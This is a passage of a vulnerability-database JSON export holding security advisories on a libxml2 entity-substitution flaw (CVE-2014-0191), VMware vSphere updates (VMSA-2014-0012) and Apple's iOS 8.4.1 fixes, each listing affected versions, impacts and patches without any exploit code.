parsing.", "edition": 1, "modified": "2014-05-07T00:00:00", "published": "2014-05-07T00:00:00", "id": "SECURITYVULNS:VULN:13754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13754", "title": "libxml2 DoS", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, 
{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": [], "description": "\r\n\r\nHi,\r\n\r\nIt was discovered that libxml2, a library providing support to read,\r\nmodify and write XML files, incorrectly performs entity substituton in\r\nthe doctype prolog, even if the application using libxml2 disabled any\r\nentity substitution. A remote attacker could provide a\r\nspecially-crafted XML file that, when processed, would lead to the\r\nexhaustion of CPU and memory resources or file descriptors.\r\n\r\nThis issue was discovered by Daniel Berrange of Red Hat.\r\n\r\nUpstream patch:\r\nhttps://git.gnome.org/browse/libxml2/commit/?id=9cd1c3cfbd32655d60572c0a413e017260c854df\r\n\r\nRed Hat bug:\r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1090976\r\n\r\n-- Stefan Cornelius / Red Hat Security Response Team\r\n\r\n", "edition": 1, "modified": "2014-05-07T00:00:00", "published": "2014-05-07T00:00:00", "id": "SECURITYVULNS:DOC:30700", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30700", "title": "[oss-security] CVE-2014-0191 libxml2: external parameter entity loaded when entity substitution is disabled", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-3797", "CVE-2014-0191", "CVE-2013-4238", "CVE-2013-2877", "CVE-2014-0015", "CVE-2013-1752", "CVE-2014-8371", "CVE-2014-0138"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2014-0012\r\nSynopsis: VMware vSphere product updates address security \r\n vulnerabilities\r\nIssue date: 2014-12-04\r\nUpdated on: 2014-12-04 (Initial Advisory)\r\nCVE number: CVE-2014-3797, CVE-2014-8371, CVE-2013-2877, CVE-2014-0191, \r\n CVE-2014-0015, CVE-2014-0138, CVE-2013-1752 and \r\n CVE-2013-4238\r\n- 
------------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware vSphere product updates address a Cross Site Scripting issue, \r\n a certificate validation issue and security vulnerabilities in \r\n third-party libraries.\r\n \r\n2. Relevant releases\r\n\r\n VMware vCenter Server Appliance 5.1 Prior to Update 3 \r\n\r\n VMware vCenter Server 5.5 prior to Update 2\r\n VMware vCenter Server 5.1 prior to Update 3\r\n VMware vCenter Server 5.0 prior to Update 3c\r\n\r\n VMware ESXi 5.1 without patch ESXi510-201412101-SG\r\n\r\n3. Problem Description \r\n\r\n a. VMware vCSA cross-site scripting vulnerability\r\n\r\n VMware vCenter Server Appliance (vCSA) contains a vulnerability\r\n that may allow for Cross Site Scripting. Exploitation of this \r\n vulnerability in vCenter Server requires tricking a user to click\r\n on a malicious link or to open a malicious web page while they are\r\n logged in into vCenter. \r\n\r\n VMware would like to thank Tanya Secker of Trustwave SpiderLabs for \r\n reporting this issue to us. \r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) \r\n has assigned the name CVE-2014-3797 to this issue. \r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product\tRunning Replace with/\r\n Product Version\ton Apply Patch\r\n ============= =======\t======= =================\r\n vCSA 5.5 any Not Affected\r\n vCSA 5.1 any 5.1 Update 3\r\n vCSA 5.0 any Not Affected\r\n\r\n b. vCenter Server certificate validation issue\r\n\r\n vCenter Server does not properly validate the presented certificate \r\n when establishing a connection to a CIM Server residing on an ESXi \r\n host. 
This may allow for a Man-in-the-middle attack against the CIM \r\n service.\r\n\r\n VMware would like to thank The Google Security Team for reporting \r\n this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the identifier CVE-2014-8371 to this issue. \r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= =======\t======= ==============\r\n vCenter Server 5.5 any 5.5 Update 2\r\n vCenter Server 5.1 any 5.1 Update 3\r\n vCenter Server 5.0 any 5.0 Update 3c\r\n\r\n c. Update to ESXi libxml2 package\r\n\r\n libxml2 is updated to address multiple security issues. \r\n\r\n The Common Vulnerabilities and Exposures project \r\n (cve.mitre.org) has assigned the names CVE-2013-2877 and\r\n CVE-2014-0191 to these issues. \r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======= ======= =================\r\n ESXi 5.5 any Patch Pending\r\n ESXi 5.1 any ESXi510-201412101-SG\r\n ESXi 5.0 any No patch planned\r\n\r\n d. Update to ESXi Curl package\r\n\r\n Curl is updated to address multiple security issues. \r\n\r\n The Common Vulnerabilities and Exposures project \r\n (cve.mitre.org) has assigned the names CVE-2014-0015 and \r\n CVE-2014-0138 to these issues. 
\r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product\tRunning Replace with/\r\n Product Version\ton Apply Patch\r\n ========= =======\t======= =================\r\n ESXi 5.5 any Patch Pending\r\n ESXi 5.1 any ESXi510-201412101-SG\r\n ESXi 5.0 any No patch planned\r\n\r\n e. Update to ESXi Python package\r\n\r\n Python is updated to address multiple security issues. \r\n\r\n The Common Vulnerabilities and Exposures project \r\n (cve.mitre.org) has assigned the names CVE-2013-1752 and \r\n CVE-2013-4238 to these issues. \r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======= ======= =================\r\n ESXi 5.5 any Patch Pending\r\n ESXi 5.1 any ESXi510-201412101-SG\r\n ESXi 5.0 any Patch Pending\r\n\r\n f. vCenter and Update Manager, Oracle JRE 1.6 Update 81\r\n\r\n Oracle has documented the CVE identifiers that are addressed in \r\n JRE 1.6.0 update 81 in the Oracle Java SE Critical Patch Update\r\n Advisory of July 2014. The References section provides a link to\r\n this advisory. \r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======= ======= =================\r\n vCenter Server 5.5 any not applicable *\r\n vCenter Server 5.1 any 5.1 Update 3\r\n vCenter Server 5.0 any patch pending\r\n vCenter Update Manager 5.5 any not applicable *\r\n vCenter Update Manager 5.1 any 5.1 Update 3\r\n vCenter Update Manager 5.0 any patch pending\r\n\r\n * this product uses the Oracle JRE 1.7.0 family\r\n\r\n4. Solution\r\n\r\n Please review the patch/release notes for your product and version \r\n and verify the checksum of your downloaded file. 
\r\n \r\n vCSA 5.1 Update 3, vCenter Server 5.1 Update 3 and Update Manager 5.1\r\n Update 3\r\n ----------------------------\r\n Downloads and Documentation: \r\n https://www.vmware.com/go/download-vsphere\r\n\r\n ESXi 5.1\r\n ----------------------------\r\n File: update-from-esxi5.1-5.1_update03.zip.zip\r\n md5sum: b3fd3549b59c6c59c04bfd09b08c6edf\r\n sha1sum: 02139101fe205894774caac02820f6ea8416fb8b\r\n http://kb.vmware.com/kb/2086288\r\n update-from-esxi5.1-5.1_update03 contains ESXi510-201412101-SG\r\n \r\n5. References\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3797\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8371\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2877\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0015\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0138\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1752\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4238\r\n\r\n JRE \r\n Oracle Java SE Critical Patch Update Advisory of July 2014\r\n\r\n http://www.oracle.com/technetwork/topics/security/cpujul2014-\r\n1972956.html\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n6. Change log\r\n\r\n 2014-12-04 VMSA-2014-0012\r\n Initial security advisory in conjunction with the release of VMware\r\n vCSA 5.1 Update 3, vCenter Server 5.1 Update 3 and ESXi 5.1 Patches \r\n released on 2014-12-04.\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n7. 
Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n security-announce at lists.vmware.com\r\n bugtraq at securityfocus.com\r\n fulldisclosure at seclists.org\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n Consolidated list of VMware Security Advisories\r\n http://kb.vmware.com/kb/2078735\r\n\r\n VMware Security Response Policy\r\n https://www.vmware.com/support/policies/security_response.html\r\n\r\n VMware Lifecycle Support Phases\r\n https://www.vmware.com/support/policies/lifecycle.html\r\n \r\n Twitter\r\n https://twitter.com/VMwareSRC\r\n\r\n Copyright 2014 VMware Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: Encryption Desktop 10.3.0 (Build 8741)\r\nCharset: utf-8\r\n\r\nwj8DBQFUgLnkDEcm8Vbi9kMRArHeAKDSKrUyaCHxpcXMS8KRHlaB80B90wCdGoV1\r\nea+5vLRA631Cn0q1Mt63s4s=\r\n=OYK3\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-12-11T00:00:00", "published": "2014-12-11T00:00:00", "id": "SECURITYVULNS:DOC:31491", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31491", "title": "NEW: VMSA-2014-0012 - VMware vSphere product updates address security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:01", "bulletinFamily": "software", "cvelist": ["CVE-2015-3758", "CVE-2015-3733", "CVE-2015-3776", "CVE-2015-3736", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-5752", "CVE-2015-3744", "CVE-2015-3734", "CVE-2015-3731", "CVE-2015-3778", "CVE-2015-3752", "CVE-2015-3732", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3798", "CVE-2015-3738", "CVE-2015-5777", "CVE-2015-5759", "CVE-2015-3740", 
"CVE-2015-3782", "CVE-2015-3739", "CVE-2015-3784", "CVE-2015-3743", "CVE-2015-3768", "CVE-2015-3747", "CVE-2015-5781", "CVE-2015-5749", "CVE-2015-3805", "CVE-2015-5774", "CVE-2015-3730", "CVE-2015-3803", "CVE-2015-3750", "CVE-2015-3795", "CVE-2015-3755", "CVE-2015-5766", "CVE-2015-5746", "CVE-2015-5761", "CVE-2015-3753", "CVE-2015-5773", "CVE-2015-3800", "CVE-2015-3807", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-3749", "CVE-2015-3742", "CVE-2012-6685", "CVE-2015-3748", "CVE-2015-5775", "CVE-2015-3759", "CVE-2015-3746", "CVE-2015-5770", "CVE-2015-3793", "CVE-2015-5755", "CVE-2015-3756", "CVE-2015-5758", "CVE-2015-3763", "CVE-2015-3804", "CVE-2015-3741", "CVE-2015-3751", "CVE-2015-5782", "CVE-2015-5778", "CVE-2015-3745", "CVE-2015-3735", "CVE-2015-5757", "CVE-2015-3796", "CVE-2015-3806", "CVE-2015-3737", "CVE-2015-5769", "CVE-2015-3729"], "description": "Over 70 of different vulnerabilities.", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14631", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14631", "title": "Apple iOS multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-3758", "CVE-2015-3733", "CVE-2015-3776", "CVE-2015-3736", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-5752", "CVE-2015-3744", "CVE-2015-3734", "CVE-2015-3731", "CVE-2015-3778", "CVE-2015-3752", "CVE-2015-3732", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3798", "CVE-2015-3738", "CVE-2015-5777", "CVE-2015-5759", "CVE-2015-3740", "CVE-2015-3782", "CVE-2015-3739", "CVE-2015-3784", "CVE-2015-3743", "CVE-2015-3768", "CVE-2015-3747", "CVE-2015-5781", "CVE-2015-5749", "CVE-2015-3805", "CVE-2015-5774", "CVE-2015-3730", "CVE-2015-3803", "CVE-2015-3750", "CVE-2015-3795", "CVE-2015-3755", "CVE-2015-5766", 
"CVE-2015-5746", "CVE-2015-5761", "CVE-2015-3753", "CVE-2015-5773", "CVE-2015-3800", "CVE-2015-3807", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-3749", "CVE-2015-3742", "CVE-2012-6685", "CVE-2015-3748", "CVE-2015-5775", "CVE-2015-3759", "CVE-2015-3746", "CVE-2015-5770", "CVE-2015-3793", "CVE-2015-5755", "CVE-2015-3756", "CVE-2015-5758", "CVE-2015-3763", "CVE-2015-3804", "CVE-2015-3741", "CVE-2015-3751", "CVE-2015-5782", "CVE-2015-5778", "CVE-2015-3745", "CVE-2015-3735", "CVE-2015-5757", "CVE-2015-3796", "CVE-2015-3806", "CVE-2015-3737", "CVE-2015-5769", "CVE-2015-3729"], "description": "\r\n\r\nAPPLE-SA-2015-08-13-3 iOS 8.4.1\r\n\r\niOS 8.4.1 is now available and addresses the following:\r\n\r\nAppleFileConduit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A maliciously crafted afc command may allow access to\r\nprotected parts of the filesystem\r\nDescription: An issue existed in the symbolic linking mechanism of\r\nafc. This issue was addressed by adding additional path checks.\r\nCVE-ID\r\nCVE-2015-5746 : evad3rs, TaiG Jailbreak Team\r\n\r\nAir Traffic\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: AirTraffic may have allowed access to protected parts of the\r\nfilesystem\r\nDescription: A path traversal issue existed in asset handling. This\r\nwas addressed with improved validation.\r\nCVE-ID\r\nCVE-2015-5766 : TaiG Jailbreak Team\r\n\r\nBackup\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to create symlinks to\r\nprotected regions of the disk\r\nDescription: An issue existed within the path validation logic for\r\nsymlinks. 
This issue was addressed through improved path\r\nsanitization.\r\nCVE-ID\r\nCVE-2015-5752 : TaiG Jailbreak Team\r\n\r\nbootp\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious Wi-Fi network may be able to determine networks\r\na device has previously accessed\r\nDescription: Upon connecting to a Wi-Fi network, iOS may have\r\nbroadcast MAC addresses of previously accessed networks via the DNAv4\r\nprotocol. This issue was addressed through disabling DNAv4 on\r\nunencrypted Wi-Fi networks.\r\nCVE-ID\r\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,\r\nUniversity of Oxford (on the EPSRC Being There project)\r\n\r\nCertificate UI\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: An attacker with a privileged network position may be able\r\nto accept untrusted certificates from the lock screen\r\nDescription: Under certain circumstances, the device may have\r\npresented a certificate trust dialog while in a locked state. This\r\nissue was addressed through improved state management.\r\nCVE-ID\r\nCVE-2015-3756 : Andy Grant of NCC Group\r\n\r\nCloudKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to access the iCloud\r\nuser record of a previously signed in user\r\nDescription: A state inconsistency existed in CloudKit when signing\r\nout users. This issue was addressed through improved state handling.\r\nCVE-ID\r\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\r\n\r\nCFPreferences\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious app may be able to read other apps' managed\r\npreferences\r\nDescription: An issue existed in the third-party app sandbox. 
This\r\nissue was addressed by improving the third-party sandbox profile.\r\nCVE-ID\r\nCVE-2015-3793 : Andreas Weinlein of the Appthority Mobility Threat\r\nTeam\r\n\r\nCode Signing\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to execute unsigned code\r\nDescription: An issue existed that allowed unsigned code to be\r\nappended to signed code in a specially crafted executable file. This\r\nissue was addressed through improved code signature validation.\r\nCVE-ID\r\nCVE-2015-3806 : TaiG Jailbreak Team\r\n\r\nCode Signing\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A specially crafted executable file could allow unsigned,\r\nmalicious code to execute\r\nDescription: An issue existed in the way multi-architecture\r\nexecutable files were evaluated that could have allowed unsigned code\r\nto be executed. This issue was addressed through improved validation\r\nof executable files.\r\nCVE-ID\r\nCVE-2015-3803 : TaiG Jailbreak Team\r\n\r\nCode Signing\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A local user may be able to execute unsigned code\r\nDescription: A validation issue existed in the handling of Mach-O\r\nfiles. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-3802 : TaiG Jailbreak Team\r\nCVE-2015-3805 : TaiG Jailbreak Team\r\n\r\nCoreMedia Playback\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in CoreMedia\r\nPlayback. 
This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5777 : Apple\r\nCVE-2015-5778 : Apple\r\n\r\nCoreText\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nDiskImages\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\r\n\r\nFontParser\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. 
This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-3804 : Apple\r\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-5775 : Apple\r\n\r\nImageIO\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Processing a maliciously crafted .tiff file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\n.tiff files. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5758 : Apple\r\n\r\nImageIO\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of PNG images. Visiting a malicious website may\r\nresult in sending data from process memory to the website. This issue\r\nwas addressed through improved memory initialization and additional\r\nvalidation of PNG images.\r\nCVE-ID\r\nCVE-2015-5781 : Michal Zalewski\r\n\r\nImageIO\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of TIFF images. Visiting a malicious website may\r\nresult in sending data from process memory to the website. 
This issue\r\nis addressed through improved memory initialization and additional\r\nvalidation of TIFF images.\r\nCVE-ID\r\nCVE-2015-5782 : Michal Zalewski\r\n\r\nIOKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Parsing a maliciously crafted plist may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption existed in processing of malformed\r\nplists. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\r\n(@jollyjinx) of Jinx Germany\r\n\r\nIOHIDFamily\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A buffer overflow issue existed in IOHIDFamily. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5774 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in the mach_port_space_info interface,\r\nwhich could have led to the disclosure of kernel memory layout. This\r\nwas addressed by disabling the mach_port_space_info interface.\r\nCVE-ID\r\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\r\n@PanguTeam\r\n\r\nKernel\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: An integer overflow existed in the handling of IOKit\r\nfunctions. 
This issue was addressed through improved validation of\r\nIOKit API arguments.\r\nCVE-ID\r\nCVE-2015-3768 : Ilja van Sprundel\r\n\r\nLibc\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Processing a maliciously crafted regular expression may lead\r\nto an unexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the TRE library.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3796 : Ian Beer of Google Project Zero\r\nCVE-2015-3797 : Ian Beer of Google Project Zero\r\nCVE-2015-3798 : Ian Beer of Google Project Zero\r\n\r\nLibinfo\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in handling AF_INET6\r\nsockets. This issue was addressed by improved memory handling.\r\nCVE-ID\r\nCVE-2015-5776 : Apple\r\n\r\nlibpthread\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling syscalls.\r\nThis issue was addressed through improved lock state checking.\r\nCVE-ID\r\nCVE-2015-5757 : Lufeng Li of Qihoo 360\r\n\r\nlibxml2\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory corruption issue existed in parsing of XML\r\nfiles. 
This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3807 : Michal Zalewski\r\n\r\nlibxml2\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\r\nto 2.9.2, the most serious of which may allow a remote attacker to\r\ncause a denial of service\r\nDescription: Multiple vulnerabilities existed in libxml2 versions\r\nprior to 2.9.2. These were addressed by updating libxml2 to version\r\n2.9.2.\r\nCVE-ID\r\nCVE-2012-6685 : Felix Groebert of Google\r\nCVE-2014-0191 : Felix Groebert of Google\r\nCVE-2014-3660 : Felix Groebert of Google\r\n\r\nlibxpc\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling of\r\nmalformed XPC messages. This issue was addressed through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-3795 : Mathew Rowley\r\n\r\nLocation Framework\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A local user may be able to modify protected parts of the\r\nfilesystem\r\nDescription: A symbolic link issue was addressed through improved\r\npath validation.\r\nCVE-ID\r\nCVE-2015-3759 : Cererdlong of Alibaba Mobile Security Team\r\n\r\nMobileInstallation\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious enterprise application may be able to replace\r\nextensions for other apps\r\nDescription: An issue existed in the install logic for universal\r\nprovisioning profile apps, which allowed a collision to occur with\r\nexisting bundle IDs. 
This issue was addressed through improved bundle\r\nID validation.\r\nCVE-ID\r\nCVE-2015-5770 : FireEye\r\n\r\nMSVDX Driver\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Viewing a malicious video may lead to an unexpected system\r\ntermination\r\nDescription: A denial of service issue was addressed through\r\nimproved memory handling.\r\nCVE-ID\r\nCVE-2015-5769 : Proteas of Qihoo 360 Nirvan Team\r\n\r\nOffice Viewer\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Parsing a maliciously crafted XML file may lead to\r\ndisclosure of user information\r\nDescription: An external entity reference issue existed in XML file\r\nparsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.\r\n\r\nQL Office\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Parsing a maliciously crafted office document may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of office\r\ndocuments. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5773 : Apple\r\n\r\nSafari\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Visiting a malicious website may lead to user interface\r\nspoofing\r\nDescription: A malicious website could open another site and prompt\r\nfor user input without a way for the user to tell where the prompt\r\noriginated. 
The issue was addressed by displaying the prompt's origin\r\nto the user.\r\nCVE-ID\r\nCVE-2015-3729 : Code Audit Labs of VulnHunt.com\r\n\r\nSafari\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious website may trigger an infinite number of alert\r\nmessages\r\nDescription: An issue existed where a malicious or hacked website\r\ncould show infinite alert messages and make users believe their\r\nbrowser was locked. The issue was addressed through throttling of\r\nJavaScript alerts.\r\nCVE-ID\r\nCVE-2015-3763\r\n\r\nSandbox_profiles\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious app may be able to read other apps' managed\r\npreferences\r\nDescription: An issue existed in the third-party app sandbox. This\r\nissue was addressed by improving the third-party sandbox profile.\r\nCVE-ID\r\nCVE-2015-5749 : Andreas Weinlein of the Appthority Mobility Threat\r\nTeam\r\n\r\nUIKit WebView\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to initiate FaceTime\r\ncalls without user authorization\r\nDescription: An issue existed in the parsing of FaceTime URLs within\r\nWebViews. 
